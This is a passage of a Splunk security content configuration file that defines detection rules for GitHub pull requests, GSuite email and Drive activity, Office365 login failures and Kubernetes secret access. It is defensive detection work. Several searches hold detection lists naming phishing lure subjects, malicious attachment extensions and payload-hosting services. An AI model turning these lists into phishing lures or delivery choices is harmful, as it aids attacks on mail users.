action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GitHub Pull Request from Unknown User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `github` check_suite.pull_requests{}.id=* | stats count by check_suite.head_commit.author.name repository.full_name check_suite.pull_requests{}.head.ref check_suite.head_commit.message | rename check_suite.head_commit.author.name as user repository.full_name as repository check_suite.pull_requests{}.head.ref as ref_head check_suite.head_commit.message as commit_message | search NOT `github_known_users` | eval phase="code" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_pull_request_from_unknown_user_filter`

[ESCU - Gsuite Drive Share In External Email - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search detects suspicious Google Drive or Google Docs files shared outside the organization. This might be a good hunting query to monitor exfiltration of data by an attacker or insider to a targeted machine.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567.002", "T1567"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search detects suspicious Google Drive or Google Docs files shared outside the organization. This might be a good hunting query to monitor exfiltration of data by an attacker or insider to a targeted machine.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting GSuite logs that include file attachment metadata such as file type, file extension, source email, destination email, and number of attachments. In order for the search to work in your environment, please edit the query to use your company-specific email domain instead of `internal_test_email.com`.
action.escu.known_false_positives = A network admin or normal user may share files with customers and external teams.
action.escu.creation_date = 2021-08-16
action.escu.modification_date = 2021-08-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Gsuite Drive Share In External Email - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"]
action.escu.analytic_story = ["Dev Sec Ops", "Insider Threat"]
action.risk = 1
action.risk.param._risk_message = suspicious share gdrive from $parameters.owner$ to $email$ namely as $parameters.doc_title$
action.risk.param._risk = [{"risk_object_field": "parameters.owner", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "email", "risk_object_type": "user", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Gsuite Drive Share In External Email - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567.002", "T1567"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `gsuite_drive` NOT (email IN("", "null")) | rex field=parameters.owner "[^@]+@(?<src_domain>[^@]+)" | rex field=email "[^@]+@(?<dest_domain>[^@]+)" | where src_domain = "internal_test_email.com" and not dest_domain = "internal_test_email.com" | eval phase="plan" | eval severity="low" | stats values(parameters.doc_title) as doc_title, values(parameters.doc_type) as doc_types, values(email) as dst_email_list, values(parameters.visibility) as visibility, values(parameters.doc_id) as doc_id, count min(_time) as firstTime max(_time) as lastTime by parameters.owner ip_address phase severity | rename parameters.owner as user ip_address as src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_drive_share_in_external_email_filter`

[ESCU - GSuite Email Suspicious Attachment - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious attachment file extension in GSuite email that may be related to a spear phishing attack. These file types are commonly used by malware to lure a user into clicking on them, executing malicious code that compromises the targeted machine. This search can also catch some normal files of these types that may be sent by an employee or network admin.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search detects a suspicious attachment file extension in GSuite email that may be related to a spear phishing attack. These file types are commonly used by malware to lure a user into clicking on them, executing malicious code that compromises the targeted machine. This search can also catch some normal files of these types that may be sent by an employee or network admin.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting GSuite logs that include file attachment metadata such as file type, file extension, source email, destination email, and number of attachments.
action.escu.known_false_positives = A network admin or normal user may send these file attachments as part of their day-to-day work. Having a good protocol for attaching these file types to e-mail may reduce the risk of a spear phishing attack.
action.escu.creation_date = 2021-08-16 action.escu.modification_date = 2021-08-16 action.escu.confidence = high action.escu.full_search_name = ESCU - GSuite Email Suspicious Attachment - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious email from $source.address$ to $destination{}.address$ action.risk.param._risk = [{"risk_object_field": "source.address", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "destination{}.address", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GSuite Email Suspicious Attachment - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` "attachment{}.file_extension_type" IN ("pl", "py", "rb", "sh", "bat", "exe", "dll", "cpl", "com", "js", "vbs", "ps1", "reg","swf", "cmd", "go") | eval phase="plan" | eval severity="medium" | stats count min(_time) as firstTime max(_time) as lastTime values(attachment{}.file_extension_type) as email_attachments, values(attachment{}.sha256) as attachment_sha256, values(payload_size) as payload_size by destination{}.service num_message_attachments subject destination{}.address source.address phase severity 
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_email_suspicious_attachment_filter` [ESCU - Gsuite Email Suspicious Subject With Attachment - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a gsuite email contains suspicious subject having known file type used in spear phishing. This technique is a common and effective entry vector of attacker to compromise a network by luring the user to click or execute the suspicious attachment send from external email account because of the effective social engineering of subject related to delivery, bank and so on. On the other hand this detection may catch a normal email traffic related to legitimate transaction so better to check the email sender, spelling and etc. avoid click link or opening the attachment if you are not expecting this type of e-mail. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a gsuite email contains suspicious subject having known file type used in spear phishing. This technique is a common and effective entry vector of attacker to compromise a network by luring the user to click or execute the suspicious attachment send from external email account because of the effective social engineering of subject related to delivery, bank and so on. On the other hand this detection may catch a normal email traffic related to legitimate transaction so better to check the email sender, spelling and etc. avoid click link or opening the attachment if you are not expecting this type of e-mail. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. 
action.escu.known_false_positives = normal user or normal transaction may contain the subject and file type attachment that this detection try to search. action.escu.creation_date = 2021-08-19 action.escu.modification_date = 2021-08-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Email Suspicious Subject With Attachment - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious email from $source.address$ to $destination{}.address$ action.risk.param._risk = [{"risk_object_field": "source.address", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Email Suspicious Subject With Attachment - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` num_message_attachments > 0 subject IN ("*dhl*", "* ups *", "*delivery*", "*parcel*", "*label*", "*invoice*", "*postal*", "* fedex *", "* usps *", "* express *", "*shipment*", "*Banking/Tax*","*shipment*", "*new order*") attachment{}.file_extension_type IN ("doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "zip", "rar", "html","htm","hta") | rex field=source.from_header_address "[^@]+@(?[^@]+)" | rex 
field=destination{}.address "[^@]+@(?[^@]+)" | where not source_domain="internal_test_email.com" and dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="medium" | stats count min(_time) as firstTime max(_time) as lastTime values(attachment{}.file_extension_type) as email_attachments, values(attachment{}.sha256) as attachment_sha256, values(payload_size) as payload_size by destination{}.service num_message_attachments subject destination{}.address source.address phase severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_email_suspicious_subject_with_attachment_filter` [ESCU - Gsuite Email With Known Abuse Web Service Link - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytics is to detect a gmail containing a link that are known to be abused by malware or attacker like pastebin, telegram and discord to deliver malicious payload. This event can encounter some normal email traffic within organization and external email that normally using this application and services. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytics is to detect a gmail containing a link that are known to be abused by malware or attacker like pastebin, telegram and discord to deliver malicious payload. This event can encounter some normal email traffic within organization and external email that normally using this application and services. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. action.escu.known_false_positives = normal email contains this link that are known application within the organization or network can be catched by this detection. 
action.escu.creation_date = 2021-08-23 action.escu.modification_date = 2021-08-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Email With Known Abuse Web Service Link - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious email from $source.address$ to $destination{}.address$ action.risk.param._risk = [{"risk_object_field": "source.address", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Email With Known Abuse Web Service Link - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` "link_domain{}" IN ("*pastebin.com*", "*discord*", "*telegram*","t.me") | rex field=source.from_header_address "[^@]+@(?[^@]+)" | rex field=destination{}.address "[^@]+@(?[^@]+)" | where not source_domain="internal_test_email.com" and dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="low" |stats values(link_domain{}) as link_domains min(_time) as firstTime max(_time) as lastTime count by is_spam source.address source.from_header_address subject destination{}.address phase severity | `security_content_ctime(firstTime)` | 
`security_content_ctime(lastTime)` | `gsuite_email_with_known_abuse_web_service_link_filter` [ESCU - Gsuite Outbound Email With Attachment To External Domain - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious outbound e-mail from internal email to external email domain. This can be a good hunting query to monitor insider or outbound email traffic for not common domain e-mail. The idea is to parse the domain of destination email check if there is a minimum outbound traffic < 20 with attachment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003", "T1048"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious outbound e-mail from internal email to external email domain. This can be a good hunting query to monitor insider or outbound email traffic for not common domain e-mail. The idea is to parse the domain of destination email check if there is a minimum outbound traffic < 20 with attachment. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. action.escu.known_false_positives = network admin and normal user may send this file attachment as part of their day to day work. having a good protocol in attaching this file type to an e-mail may reduce the risk of having a spear phishing attack. 
action.escu.creation_date = 2024-03-25 action.escu.modification_date = 2024-03-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Outbound Email With Attachment To External Domain - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops", "Insider Threat"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Outbound Email With Attachment To External Domain - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003", "T1048"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_gmail` num_message_attachments > 0 | rex field=source.from_header_address "[^@]+@(?[^@]+)" | rex field=destination{}.address "[^@]+@(?[^@]+)" | where source_domain="internal_test_email.com" and not dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="low" | stats values(subject) as subject, values(source.from_header_address) as src_domain_list, count as numEvents, dc(source.from_header_address) as numSrcAddresses, min(_time) as firstTime max(_time) as lastTime by dest_domain phase severity | where numSrcAddresses < 20 |sort - numSrcAddresses | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_outbound_email_with_attachment_to_external_domain_filter` [ESCU - Gsuite suspicious calendar invite - Rule] action.escu = 0 action.escu.enabled = 1 
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search can help the detection of compromised accounts or internal users sending suspcious calendar invites via GSuite calendar. These invites may contain malicious links or attachments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search can help the detection of compromised accounts or internal users sending suspcious calendar invites via GSuite calendar. These invites may contain malicious links or attachments. action.escu.how_to_implement = In order to successfully implement this search, you need to be ingesting logs related to gsuite (gsuite:calendar:json) having the file sharing metadata like file type, source owner, destination target user, description, etc. This search can also be made more specific by selecting specific emails, subdomains timeframe, organizational units, targeted user, etc. In order for the search to work for your environment please update `yourdomain.com` value in the query with the domain relavant for your organization. action.escu.known_false_positives = This search will also produce normal activity statistics. Fields such as email, ip address, name, parameters.organizer_calendar_id, parameters.target_calendar_id and parameters.event_title may give away phishing intent.For more specific results use email parameter. 
action.escu.creation_date = 2021-10-24 action.escu.modification_date = 2021-10-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite suspicious calendar invite - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Spearphishing Attachments"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Gsuite suspicious calendar invite - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_calendar` |bin span=5m _time |rename parameters.* as * |search target_calendar_id!=null email="*yourdomain.com"| stats count values(target_calendar_id) values(event_title) values(event_guest) by email _time | where count >100| `gsuite_suspicious_calendar_invite_filter` [ESCU - Gsuite Suspicious Shared File Name - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a shared file in google drive with suspicious file name that are commonly used by spear phishing campaign. This technique is very popular to lure the user by running a malicious document or click a malicious link within the shared file that will redirected to malicious website. This detection can also catch some normal email communication between organization and its external customer. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a shared file in google drive with suspicious file name that are commonly used by spear phishing campaign. This technique is very popular to lure the user by running a malicious document or click a malicious link within the shared file that will redirected to malicious website. This detection can also catch some normal email communication between organization and its external customer. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs related to gsuite having the file attachment metadata like file type, file extension, source email, destination email, num of attachment and etc. In order for the search to work for your environment, please edit the query to use your company specific email domain instead of `internal_test_email.com`. 
action.escu.known_false_positives = normal user or normal transaction may contain the subject and file type attachment that this detection try to search action.escu.creation_date = 2021-08-23 action.escu.modification_date = 2021-08-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Gsuite Suspicious Shared File Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = suspicious share gdrive from $parameters.owner$ to $email$ namely as $parameters.doc_title$ action.risk.param._risk = [{"risk_object_field": "parameters.owner", "risk_object_type": "other", "risk_score": 21}, {"risk_object_field": "email", "risk_object_type": "user", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Gsuite Suspicious Shared File Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gsuite_drive` parameters.owner_is_team_drive=false "parameters.doc_title" IN ("*dhl*", "* ups *", "*delivery*", "*parcel*", "*label*", "*invoice*", "*postal*", "*fedex*", "* usps *", "* express *", "*shipment*", "*Banking/Tax*","*shipment*", "*new order*") parameters.doc_type IN ("document","pdf", "msexcel", "msword", "spreadsheet", "presentation") | rex 
field=parameters.owner "[^@]+@(?[^@]+)" | rex field=parameters.target_user "[^@]+@(?[^@]+)" | where not source_domain="internal_test_email.com" and dest_domain="internal_test_email.com" | eval phase="plan" | eval severity="low" | stats count min(_time) as firstTime max(_time) as lastTime by email parameters.owner parameters.target_user parameters.doc_title parameters.doc_type phase severity | rename parameters.target_user AS user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gsuite_suspicious_shared_file_name_filter` [ESCU - High Number of Login Failures from a single source - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects multiple failed login attempts in Office365 Azure Active Directory from a single source IP address. Specifically, it identifies scenarios where there are more than 10 unsuccessful login attempts within a short time frame. The detection leverages Office365 management activity logs, specifically the AzureActiveDirectoryStsLogon records from the AzureActiveDirectory workload. It aggregates these logs in 5-minute intervals to count the number of failed login attempts and associates them with the originating source IP address. Multiple failed login attempts from a single source can be indicative of brute-force attacks, password spraying, or other malicious authentication attempts. Identifying and responding to these patterns promptly can prevent unauthorized access and potential breaches. If this detection represents a true positive, an attacker might be attempting to gain unauthorized access to an Office365 account. Successful compromise could lead to unauthorized access to sensitive data, potential lateral movement within the organization, or further malicious activities using the compromised account. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.001", "T1110"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects multiple failed login attempts in Office365 Azure Active Directory from a single source IP address. Specifically, it identifies scenarios where there are more than 10 unsuccessful login attempts within a short time frame. The detection leverages Office365 management activity logs, specifically the AzureActiveDirectoryStsLogon records from the AzureActiveDirectory workload. It aggregates these logs in 5-minute intervals to count the number of failed login attempts and associates them with the originating source IP address. Multiple failed login attempts from a single source can be indicative of brute-force attacks, password spraying, or other malicious authentication attempts. Identifying and responding to these patterns promptly can prevent unauthorized access and potential breaches. If this detection represents a true positive, an attacker might be attempting to gain unauthorized access to an Office365 account. Successful compromise could lead to unauthorized access to sensitive data, potential lateral movement within the organization, or further malicious activities using the compromised account. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. Adjust the threshold value to suit the specific environment, as environments with naturally higher login failures might generate false positives at a lower threshold. action.escu.known_false_positives = An Ip address with more than 10 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application. 
action.escu.creation_date = 2020-12-16 action.escu.modification_date = 2020-12-16 action.escu.confidence = high action.escu.full_search_name = ESCU - High Number of Login Failures from a single source - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = Ip address $src_ip$ failed to authenticate more than 10 times in a 5 minute action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - High Number of Login Failures from a single source - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110.001", "T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed record_type=AzureActiveDirectoryStsLogon | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(user) as user values(LogonError) as LogonError values(signature) as signature values(UserAgent) as UserAgent by _time, src_ip | where failed_attempts > 10 | `high_number_of_login_failures_from_a_single_source_filter` [ESCU - Kubernetes Abuse of Secret by Unusual Location - Rule] action.escu = 0 
action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets from unusual locations. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by country. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets from unusual locations. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by country. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. 
Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-06 action.escu.modification_date = 2023-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Abuse of Secret by Unusual Location - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Access of Kubernetes secret $objectRef.name$ from unusual location $Country$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Abuse of Secret by Unusual Location - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=secrets verb=get | iplocation sourceIPs{} | fillnull | search NOT `kube_allowed_loactions` | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} 
stage user.groups{} user.uid user.username userAgent verb City Country | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_abuse_of_secret_by_unusual_location_filter` [ESCU - Kubernetes Abuse of Secret by Unusual User Agent - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user agents. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user agent. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user agents. It identifies anomalies in access patterns by segmenting and analyzing the source of requests by user agent. Kubernetes Secrets, which store sensitive information like passwords, OAuth tokens, and SSH keys, are critical assets, and their misuse can lead to significant security breaches. This behavior is worth identifying for a SOC as it could indicate an attacker attempting to exfiltrate or misuse these secrets. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. 
